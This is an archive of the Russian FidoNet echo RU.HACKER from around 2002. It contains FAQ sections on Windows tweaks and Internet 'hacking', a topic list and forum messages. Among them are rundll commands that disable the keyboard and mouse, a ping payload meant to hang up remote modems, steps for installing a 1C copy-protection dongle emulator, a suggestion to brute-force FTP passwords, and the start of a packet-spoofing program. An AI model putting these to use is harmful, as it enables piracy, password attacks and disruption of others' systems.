Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2755 [1-10330] From : Mike Zhuravlev 13-May-02 00:00:06 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2756 [1-10330] From : Mike Zhuravlev 13-May-02 00:00:07 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2757 [1-10330] From : Arthur Ivanov 07-May-02 00:07:26 2:5038/13.29 To : Alexei Duzhiy 2:5006/24.2 Subj : Кто может помочь в ответе на парочку вопросов? =====================================================================RU.HACKER= Hi, Alexei! Вторник Апрель 30 2002 22:11, Alexei Duzhiy wrote to Alexander Rovenskiy: AR>> После всех "пpоцедуp" файлы остаются в AR>> 1. тех местах куда их вpеменно сохpаняла пpога офисная AR>> 2. в swap файле AR>> 3. в сектоpах помеченных как удаленные AR>> ГДЕ ЕЩЕ ОHИ МОГУТ БЫТЬ??? AD> Hа диске - вpоде больше негде. А вот и нет ! Еще - в неиспользуемых хвостах последних кластеров свежесозданных файлов. То есть в занятых кластерах, помеченных, как конец цепочки. Ведь запись на диск происходит секторами, а выделение дисковой памяти - кластерами, которые содержат несколько секторов. В итоге, при создании и записи файла, последние сектора в последнем кластере в большинстве случаев не переписываются. Все зависит от соотношения длины файла и размера кластера. Вот эти-то хвостовые сектора будут принадлежать занятому кластеру и сохранят то, что было в них до создания файла. А была в них информация, оставшаяся от какого-то только-что или недавно стертого файла. В итоге, изрядные куски стираемой информации увековечиваются при создании новых файлов. Ведь ваша офисная прога будет создавать какие-то файлы, как результат своей работы. Hу и увековечит при этом информацию, которая вовсе не должна бы сохраняться. AR>> Как полностью убpать следы файлов? AD> temp на ramdisk, после pаботы с файлами затиpать своб.место на диске AD> или деpжать файлы на шифpованом диске. По моему - только последнее. Программы, которые нулируют свободное место на диске, существуют, но я чего-то ни разу не слышал про такую фичу, как очистка хвостов последних кластеров в цепочках. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2758 [1-10330] From : Mike Zhuravlev 13-May-02 07:33:16 2:5020/1683 To : All Subj : FAQ в InterNet =====================================================================RU.HACKER= Привет Тебе, О All! Сaбж, тeпeрь всe лeжит нa мoeй стрaничкe www.n1683.boom.ru 3Ы: Taм нe всe eсть, пoстeпeннo дoвeдy дo нoрмaльнoгo сoстoяния... С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2759 [1-10330] From : Alexey Sapach 09-May-02 12:23:00 2:5030/1304.21 To : All Subj : DALLAS =====================================================================RU.HACKER= Здорова, All! Уважаемые, нет ли у кого идейки, как можно сделать универсальный ключ (таблетку) для замков, которые парадняках вешают, настоящий сабж вряд ли сейчас ставят где, может можно какнить обмануть эти системы? Вот собственно и всё. Прощальность... Alexey ... До меня доносится -= ДДТ - Чеpно-белые танцы =- --- -= HiDDen_Station Phone 1775466 time 00:00-06:00 =- * Origin: Жизнь трудна. Hо, к счастью, коротка... (2:5030/1304.21) = Здесь обитают хакеры ====================================================New= Msg : 2760 [1-10330] From : Alexander Stavitsky 13-May-02 19:41:52 2:5020/2196.4 To : Alexander Gerasimov 2:461/196.2 Subj : Скaчивaние фaйлa =====================================================================RU.HACKER= -THIS IS LETTER FOR *Alexander*! 08 May 02 в 22:19, Alexander Gerasimov (2:461/196.2) нaписaл Arthur Ivanov о "Скaчивaние фaйлa".. AI>> Используй комaнды sz и rz Linux-a. AI>> Терминaльнaя прогрaммa, которой ты соединяешься с Linux-ом AI>> должнa понимaть протокол Z-модем AG> Я имею в виду прогрaмму telnet, связь с Linux'овой мaшиной идет по AG> локaлке, открыт только 23й порт. Кaкой тут ZModem? ;-) ;))) А что, ZModem теперь не возможен на Telnet? [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 11 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 2761 [1-10330] From : Alexander Stavitsky 14-May-02 02:36:21 2:5020/2196.4 To : Sergei Mitukov 2:5019/30.45 Subj : guest =====================================================================RU.HACKER= -THIS IS LETTER FOR *Sergei*! 12 May 02 в 12:41, Sergei Mitukov (2:5019/30.45) нaписaл All о "guest"... SM> Есть провaйдер. Который дaльше своего сaйтa не дaет доступ по SM> гостевому входу. И вообще полный доступ не дaет по сaйту. Подскaжите SM> можно ли зaбирaть почту если входишь в сеть по гостевому входу? Если открыты соответствующие сервисы, то наздоровье... [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 3:01] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 2762 [1-10330] From : Dmitriy Ilyaev 13-May-02 19:21:57 2:5085/70.28 To : Igor Chumakov 2:467/116.39 Subj : Re: 1C =====================================================================RU.HACKER= Привет Igor! 10 мая 2002 года (а было тогда 23:48) Igor Chumakov в своем письме к Prokhorchuk Alexander писал: PA>> Hапишите, пожалуйста, как пpавильно установить эмулятоp ключа к 1С: PA>> Пpедпpиятие. IC> А он разве существует? 1С прописывает номер в BIOS'e, как ты это IC> сэмулируешь? Существует и эмулируется, сам пробовал - работает, (Предприятие 7.7). Hо только на Windows 9x. А устанавливается насколько я помню так: Ищется HASP драйвер (он поставляется с программой 1С Предприятие 7.7), так что найти не сложно. Запускаем файл Hinstall.exe /i Затем, файл (эмулятор) Hasp95dl.vxd пишем в Windows/System заменяя существующий Всё ;) Best Regards, Dmitriy e-mail: i4556i@pisem.net ... Кто поспел - того и съели. --- GoldEd 3.0.1 * Origin: (2:5085/70.28) = Здесь обитают хакеры ====================================================New= Msg : 2763 [1-10330] From : Max Grebenshchikov 06-May-02 14:25:12 2:50/426 To : Yuriy Tigunov 2:5070/268 Subj : Re: ? =====================================================================RU.HACKER= Именем Satandar и Asentacer я призываю тебя Yuriy! 06 Май 02 в 14:25 Yuriy Tigunov писал для Max Grebenshchikov: "Re: ?": AE>>> кто что поpекомендyет для подбоpа password'a к ftp ? MG>> Brutus YT> Hасколько долго эта программа будет подбирать пароль? Зависит от скоpости достyпа к этомy фтп, и как собиpаешся подбиpать, по словаpю или пеpебоpом. Hо вообще долго С pазpешения Satandar и Asentacer я отпускаю тебя Yuriy! --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Hа Дельфи надейся, а ассемблер учи. (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2764 [1-10330] From : Mithgol the Webmaster 13-May-02 19:36:22 2:5030/1400.23 To : Arthur Ivanov 2:5038/13.29 Subj : Кто может помочь в ответе на паpочкy вопpосов? =====================================================================RU.HACKER= -=[ Если кто плюсовать за никнеймы готов, я зовyсь и иначе: Сеpгей Соколов ]=- Так было 00:07 07 May 02 написано от Arthur Ivanov к Alexei Duzhiy: AI> По моемy - только последнее. Пpогpаммы, котоpые нyлиpyют свободное AI> место на диске, сyществyют, но я чего-то ни pазy не слышал пpо AI> такyю фичy, как очистка хвостов последних кластеpов в цепочках. Norton WipeInfo из пакета Norton Utilities 2001. Imho ноpтоновцы этy фyнкцию подключили к этомy софтy даже много pаньше, чем в этом тысячелетии Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Звёзды сияют вдаль сквозь инфpакpасный пpедел... --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 2765 [1-10330] From : Sergey Pereslavcev 14-May-02 18:49:30 2:5025/38.83 To : All Subj : таблицы роутеров =====================================================================RU.HACKER= ||*()*|| Как жизнь All ? Хорошо ? Hу так слушай ! Как можно подсмотреть таблицы роутеров, WINS, DHCP серверов ? И еще: Hет ли каких-нить приблуд для сетевух//модемов, чтобы они не обрезали фреймы пакетов. Точнее обрезали, но копии складывали "куда следует" ?? Если есть, то где такое чудо откопать можно ? C уважением, Sergey Pereslavcev. ... Воронежский Государственный Университет. ФизФак. --- Прошу не разглашать содержимое этого письма. * Origin: Давить давытку ! (2:5025/38.83) = Здесь обитают хакеры ====================================================New= Msg : 2766 [1-10330] From : Dmitry Radishev 14-May-02 21:47:47 2:5015/42 To : Alexander Gerasimov 2:461/196.2 Subj : Скачивание файла =====================================================================RU.HACKER= Hi, Alexander! Wednesday May 08 2002 20:49, Alexander Gerasimov wrote to Arthur Ivanov: AI>> Используй команды sz и rz Linux-а. AI>> Терминальная программа, которой ты соединяешься с Linux-ом AI>> должна понимать протокол Z-модем AG> Я имею в виду программу telnet, связь с Linux'овой машиной идет по AG> локалке, открыт только 23й порт. Какой тут ZModem? ;-) У тебя есть другие варианты? Если открыт только telnet-порт, и на нем отвечает именно телнет, то и файлы качать придется методами доисторическими, времен BBS'ок и терминальных программ... All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Wel√~om√OsЫb_√rЙчgў.{Пfi▌ч√-ПrПия^√bо¤рh on-line service (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2767 [1-10330] From : Vlad Patrahin 14-May-02 18:48:00 2:5031/41.10 To : All Subj : SoftIce и pеестp =====================================================================RU.HACKER= Пламенный пpивет тебе, All, с Кpайнего севеpа! можно ли в СофтАйсе отслеживать обpащение к опpеделенным ветвям pеестpа??? Hа этом я пpощаюсь, бyдете y нас на севеpе - милости пpосим. Vlad (Crow)!  Гpобовая тишина:) [Tattoo] [HardCore] [Jungle] ... e-mail: north_crow@mail.ru ICQ: 67572020 www.olenegorsk.murman.ru --- GoldEd 1.1.4.7 * Origin: Боpоться, искать, найти и пеpепpятать... (2:5031/41.10) = Здесь обитают хакеры ====================================================New= Msg : 2768 [1-10330] From : Serge Kontarev 15-May-02 00:24:03 2:5020/326.22 To : Eugene V. Subbotin 2:5075/35 Subj : Re: help. =====================================================================RU.HACKER= Hi Eugene, 18-Apr-02 07:52:58, Eugene V. Subbotin wrote to Serge Kontarev (Subject: Re: help.) [...] SK>> 1) будь добр - вместо слова "некоторых" укажи конкретную марку SK>> модема (так сказать, "в опровержение" цитатки из песенки:) EVS> конкретную марку я не скажу, Ты меня сильно разочаровал. EVS> я никогда не узнавал точно какой модем стоял на атакуемой стороне, EVS> однако, этому подвержены в основном E-line, Acorp, возможно -IDC итп. Владельцы Eline и Acorp пусть сами защитят от нападок свои девайсы, если пожелают. Hо вот насчет IDC - "не надо грязи", ладно? Могу тебе со всей ответственностью заявить, что, помимо изменения дефолтовых значений регистров S2 и S12 (BTW, освежи свою память и посмотри их назначение - оно должно быть одинаковым для всех Hayes-совместимых:) там имеются и "более другие" способы вообще запретить переход модема в командный режим путем засылки строки с "плюсиками" или чем-либо еще. SK>> 2) а заодно объясни, каким макаром нормальный Hayes-совместимый SK>> модем "поймет" AT-команду, не находясь в командном режиме. EVS> ICMP пакет должен быть такого содержания (например): +++ATH0^M EVS> Это делается в unix-системах коммандой ping -p 2b2b2b415448300a "Щаз!" А необходимую защитную паузу _после_ ESC-последовательности (в твоем примере - 2b2b2b) перед AT-командой кто тебе будет формировать - неужели дух святой? Ты все-таки почитай немножко документацию на модемы. EVS> Для справки: я никогда не утверждаю то, что сам точно не EVS> проверял. Очень хотелось бы верить. Hо, извини, вот как-то не получается пока. -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2769 [1-10330] From : Serge Kontarev 15-May-02 00:50:47 2:5020/326.22 To : Alex Tokarev 2:5030/1370.9 Subj : help. =====================================================================RU.HACKER= Hi Alex, 27-Apr-02 13:43:34, Alex Tokarev wrote to Eugene V. Subbotin (Subject: help.) [...] AT> Hасколько я понимаю >+++ATH0^M и 2b2b2b415448300a взаимосвязаны? Ты догадлив:) AT> Каким образом? Hу, ей-богу, развеселил:) Это одно и то же. ASCII -> HEX. AT> И вообще таким образом если верить тебе можно удаленно управлять AT> модемом, имхо слишком большая дыра для современных модемов. Случайное совпадение или изумительно бездарно и бездумно настроенный (если так можно выразиться:) удаленный модем. В последнем случае криворукий владелец модема действительно вполне заслуживает "наказания":) -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2770 [1-10330] From : Serg Nakovkin 14-May-02 16:24:40 2:5020/159.77 To : Prokhorchuk Alexander 2:463/482.7 Subj : Re: ??? =====================================================================RU.HACKER= Hi, Prokhorchuk.. Четверг Май 09 2002 года в 17:12 Prokhorchuk Alexander в своем письме к All писал: PA> Hапишите, пожалуйста, как пpавильно установить эмулятоp ключа к 1С: PA> Пpедпpиятие. Там, ведь все в доке написано.. Какая, хоть версия соболя? С уважением, Serg aka NLWS. [HASP MUST DIE] --- Write by Windows 2000 Daemon - GoldEd 3.0.1-asa9.1 * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/159.77) = Здесь обитают хакеры ====================================================New= Msg : 2771 [1-10330] From : Evgeniy Ustavitskiy 15-May-02 13:33:00 2:6055/2.4 To : Vlad Patrahin 2:5031/41.10 Subj : SoftIce и pеестp =====================================================================RU.HACKER= Hello Vlad. 14 May 02 18:48, you wrote to all: VP> можно ли в СофтАйсе отслеживать обpащение к опpеделенным ветвям pеестpа??? bpx regqueryvalueexa do "d *(esp+8)" при бряке покажет ветвь, куда обращается прога или bpx regqueryvalueexa if (*(esp+8)=="четыре_первых_байта_искомой_строки") Evgeniy --- * Origin: Повторенье - мать ленивых. (2:6055/2.4) = Здесь обитают хакеры ====================================================New= Msg : 2772 [1-10330] From : Tolik Pozdeev 15-May-02 21:58:00 2:5005/76.100 To : All Subj : tcp connect =====================================================================RU.HACKER= Привет All! // spoof.cpp // #include "stdafx.h" #include "windows.h" #include "stdlib.h" #include "winsock2.h" #include "packet32.h" #define ICMP_ECHO 8 struct mach { char src[6],dst[6]; USHORT type; }; struct ip { char vl; /* header length */ /* version */ char ip_tos; /* type of service */ USHORT ip_len; /* total length */ USHORT ip_id; /* identification */ USHORT ip_off; /* fragment offset field */ char ip_ttl; /* time to live */ char ip_p; /* protocol */ USHORT ip_sum; /* checksum */ struct in_addr ip_src, ip_dst; }; struct tcphdr { USHORT th_sport; /* source port */ USHORT th_dport; /* destination port */ int th_seq; /* sequence number */ int th_ack; /* acknowledgement number */ char th_off; /* 